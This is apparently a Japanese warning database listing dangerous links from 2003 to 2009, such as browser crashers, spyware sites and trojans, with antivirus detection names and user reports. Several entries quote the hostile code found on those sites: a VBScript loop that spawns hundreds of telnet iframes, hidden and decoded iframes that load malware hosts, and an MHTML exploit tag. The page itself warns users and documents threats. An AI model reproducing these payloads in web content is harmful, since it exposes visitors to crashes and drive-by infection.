そのほかの影響は皆無。放置で構わないが、気になるならWindowsの再起動。 <html> <body> <H1> Sorry, but you've been awared... </H1> <script type="text/vbscript"> for a=1 to 800 document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">") next </script> <script type="text/vbscript"> for a=1 to 800 document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">") next ↑ こんなのが延々書いてある。」 |
| [2008/06/28] | ウィルス名:TROJ_CJ.A |
| [2008/10/11] | ウィルス名:TROJ_DIALER.ZL |
| [2007/01/15] | 2007/01/04 にトレンドマイクロ社にファイルを提出。
今日、その結果の連絡があり、ウィルス名:DIAL_DIALER.NG として検出するよう対応、とのこと。 実際に 2007/01/04 にDLしたファイルと、今日改めてDLしたファイルからウィルス名:DIAL_DIALER.NG を検出することを確認。 2007/01/04 から今日まではファイルは置き換えられていないと推測される。 |
| [2008/10/11] | 再確認。ウィルス名:DIAL_TRUSTEDZO.I |
| [2008/10/11] | ウィルス名:TROJ_DIALER.ZL |
| [2008/06/28] | ウィルス名:TROJ_DIALER.ZL |
| [2008/06/28] | ウィルス名:TROJ_CJ.A |
| [2008/06/28] | ウィルス名:TROJ_DIALER.DH |
| [2005/11/04] | ブラクラの一種?。このウィンドウ が大きくなったり、小さくなったりする。
具体的には ここ まで小さくなり、ここ まで大きくなる。 大きくなったり小さくなったりを数回繰り返すと大きくなった時に止まる。このウィンドウは普通に閉じれる。 |
| [2006/04/30] | 他の方の結果では「ウィンドウが伸び縮みするだけの楽しいブラクラ。ほっとくとそのうち止まります。ウイルス反応なし。」 |
| [2005/11/20] | スパイウェアの一種:キーロガー。チャットやメールの内容、キーボード上で打ち込まれた文字を記録するexe。 |
| [2006/02/06] | こんな感じ の海外サイトだが、これ を表示し、ウィルス名:JAVA_BYTEVER.A-1を検出する。
但し、2回目以降の確認では、ウィルス未検出。 ソースを見るとコード変換された部分がある。以下がその部分。 <iframe src= http://%77%77%77%2E%74%72%75%73%74%34%66%72%65%65%2E%77%73?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe> ↑ これを復号化すると以下のようになる。 ↓ <iframe src= http://www.trust4free.ws?id=index12 frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe> 但し、//www.trust4free.ws?id=index12(← キャプ画像 )がウィルス発動元であるかは未確認。 |
| [2007/04/03] | ウィルス名:BKDR_Generic |
| [2006/09/03] | ウィルス名:TROJ_KEYLOG.E |
| [2006/09/03] | ウィルス名:TROJ_FEARLESS.U |
| [2006/09/03] | ウィルス名:TSPY_AGENT.EY |
| [2006/09/03] | ウィルス名:TROJ_LOGIT.A |
| [2006/05/28] | こんな感じ のサイト。このページ表示まで無害で、普通に閉じれる。
一見、普通のサイトに見えるが、スパイウェア配布サイトである。 |
| [2005/11/29] | ウィルス名:SPYW_TRY2FND.221 |
| [2005/01/01] | 踏むと//lb1.netster.com/Index.asp?Site=dHMtbXVzaWMuY29tに飛ばされ、「Search the Web:」という検索サイト。
toolbarをインストールしろ、というポプアプが1つ。このポプアプは普通に閉じれる。 最初の検索サイトを閉じるとSPYBOT反応:HitBox+Gator。その後、妙なウィンドウがタスクバーに現れる。 |
| [2005/10/23] | お寄せいただいた情報では、
「//lb1.netster.com/index.asp?Site=d3d3LnRzLW11c2ljLmNvbQ==という検索ができるサイトに飛びます。ポップアップブロッカーが起動しました。」 |
| [2003/10/05] | 無限スクリプト。 |
| [2007/03/11] | 踏むと真っ白なページ。ソースのほとんどはコード変換されている。その中に以下のURLが隠れている。
//www.ttbbss123.com/jp/jpg001.exe |
| [2007/03/11] | ウィルス名:POSSIBLE_LINEAGE |
| [2008/11/15] | ファイルサイズ:3.25MB 。ウィルス名:ADW_SAVENOW.AH |
| [2004/11/27] | ウィルス名:BKDR_MOO.DLL |
| [2005/05/24] | TELNET画面3つ、アウトルック、リアルプレーヤーが立ち上がる。
アンチドートでウィルス名:HTML.Mhtを検出するらしい。 |
| [2005/09/24] | 直踏みで真っ白なページ。ブラクラ発動は無し。 |
| [2008/11/22] | 「ilove.scr」ファイルが落ちてくるが、ウィルス名:TROJ_AGENT.AMIO+WORM_AUTORUN.MCS を検出。 |
| [2008/11/22] | 2008/10/19 にトレンドマイクロ社にファイルを提出。
2008/11/21 にその結果の連絡があり、ウィルス名:TROJ_AGENT.AMIO として検出するよう対応、とのこと。 2008/10/19 にDLしたファイルからウィルス名:TROJ_AGENT.AMIO を検出することを確認。 しかし、今日改めて当該URLからDLしてみると、ウィルス名:TROJ_AGENT.AMIO を検出するが、他にウィルス名:WORM_AUTORUN.MCS も検出。 |
| [2006/02/15] | 踏むとHDDが唸りだし、ウィルス名:JS_PETCH.A を検出。それとメディアが立ち上がる。
こんな画面 を表示し、同時に これ を表示。また、この別窓 を表示する。ともに普通に閉じれる。 |
| [2006/02/09] | 踏むと こんな感じ のサイト。
バスター無反応だが、他のアンチウィルスソフトで反応するらしい。 ソースを見るとIFRAMEタグで以下のURLを呼び出している。 //www.twganwwko.com/jp2/jp/index.htm |
| [2006/02/17] | 他の方の結果は以下の「」内。
「ウィルス反応あり(Backdoor.Hupigon.CS) 。感染有無の判定はできませんが、興味があったので調べてみました。 ・ girl.jpg は、実体は html ファイルで、jpeg 偽装。 ・ 上記内部は、iframe src で、2.jpg と index.htm 記載。 ・ 2.jpg は、女性局部に眼を付けて顔にしたコラージュ(4 x 3)。 ・ ( 画像下部に、Ultimate Alien Collection ロゴ有り ) ・ index.htm は、data = logo.jpg 記載。 ・ logo.jpg は、JPEG偽装の圧縮?ファイルで、BitDefender でウィルス反応。 ・ 結果は、logo.jpg =>/IEXPLORE.EXE infected: Backdoor.Hupigon.CS ・ よって、感染すると 偽 IEXPLORE が起動すると思われる。」 |
| [2006/02/19] | 「IEで閲覧したらトロイを検出。firefoxでは表示すらされず。Janeの画像ビューアで内容確認しました。」 |
| [2006/02/25] | 「ソースを見るとインラインフレームタグで2つのURLを呼び込み。jpeg偽造の圧縮ファイルかと。VBでは反応しませんでしたが、アンチドートでトロイ検出しました。」 |
| [2006/01/28] | 踏むと真っ白なページ。ソースを見るとコード変換されている部分がある。ソースを復号化すると以下のようになる。
<html> <OBJECT style="display:none;" type="text/x-scriptlet" data="MK:@MSITStore:mhtml:c:\.mht!http://www.twganwwko.com/wrj/logo.jpg::/102.htm"></OBJECT> </body> </html> |
| [2006/01/20] | こんな感じ の画像だが、同時に以下のURLを呼び出している。アンチウィルスソフトによってウィルスを検出する。
//www.twganwwko.com/wrj/index.htm |
| [2006/01/28] | 他の方の結果では「Exploit-MhtRedirというトロイの木馬が出ました。」 |
| [2006/01/29] | ノートンでは Trojan Horse を検出するらしい。 |
| [2006/02/09] | 踏むと こんな感じ のサイト。
バスター無反応だが、他のアンチウィルスソフトで反応するらしい。 ソースを見るとIFRAMEタグで以下のURLを呼び出している。 //www.twguoyong.com/buty/index.htm |
| [2006/02/09] | 他の方の結果は以下の「」内。
「画像ではありません。HTMLスクリプトです。スクリプトの中で別のページをサイズ0(表示しない)で呼び出してから、画像を呼び出しています。呼び出された別ページにウイルスが仕掛けられているようです。」 |
| [2006/02/12] | ノートンでは Trojan Horse を検出するらしい。 |
| [2006/02/05] | 「asp.com」という名のファイルが落ちてくる。バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → Trojan/PSW.Linea.ma.2.A ArcaVir → Trojan.Psw.Lineage.Ue Avast → Win32:Lineage-129 Dr.Web → Trojan.PWS.Lineage Fortinet → W32/Lineage.UE!pws Kaspersky → Trojan-PSW.Win32.Lineage.ue NOD32 → a variant of Win32/PSW.Lineage VBA32 → Trojan-PSW.Win32.Lineage.ue |
| [2006/01/02] | 「jpg2046」というファイルが落ちてくる。バスター無反応だが、以下のアンチウィルスソフトで反応。
AntiVir → Trojan/Copiet.B.1 Dr.Web → DLOADER.Trojan Kaspersky Anti-Virus → Trojan-Downloader.Win32.Delf.ade |
| [2006/01/14] | ファイルサイズ:129KB。バスター無反応だが、以下のアンチウィルスソフトで反応。
Dr.Web → Trojan.PWS.Lineage Fortinet → W32/Lineage.OI!pws Kaspersky Anti-Virus → Trojan-PSW.Win32.Lineage.oi |
| [2006/08/24] | こんな感じ のページ。バスター無反応だが、他社製アンチウィルスソフトではウィルス反応があると思われる。 |
| [2006/07/28] | こんな感じ のサイトだが、ウィルス名:EXPL_IFRAMEBO.A を検出。 ソースを見るとIFRAMEタグで以下のURLを呼び出している。 //www.lovetw.webnow.biz/psm-h00x/vivichat.htm |
| [2006/07/28] | 他の方の結果は以下の「」内。
「貴方訪問のあみが立つの中を建設している........と言うサイトです。ページ内にはボーイズラブ系の虹画像が貼られているのみですが、アクセスするとトロイが仕掛けられた危険サイトが呼び出されPCの動作重くなります。」 |
| [2005/11/20] | ファイルサイズ:238KB 。「co.jp.com」というMS-DOSアプリケーションファイルをDLさせようとする。
バスター無反応だが、以下のアンチウィルスソフトで反応。 Dr.Web → Trojan.PWS.Lineage Kaspersky Anti-Virus → Trojan-PSW.Win32.Lineage.oi |
| [2005/11/29] | リネージュのアカウントなどを狙ったトロイの木馬らしい。 |
| [2005/11/29] | アンチドートで Exploit.HTML.Mht を検出。 |
| [2009/08/01] | ファイルサイズ:27.5 KB 。ウィルス名:TROJ_DLOADR.AID
ファイルによってはウィルス名:TROJ_AGENT.ANWC を検出するものもある。 |
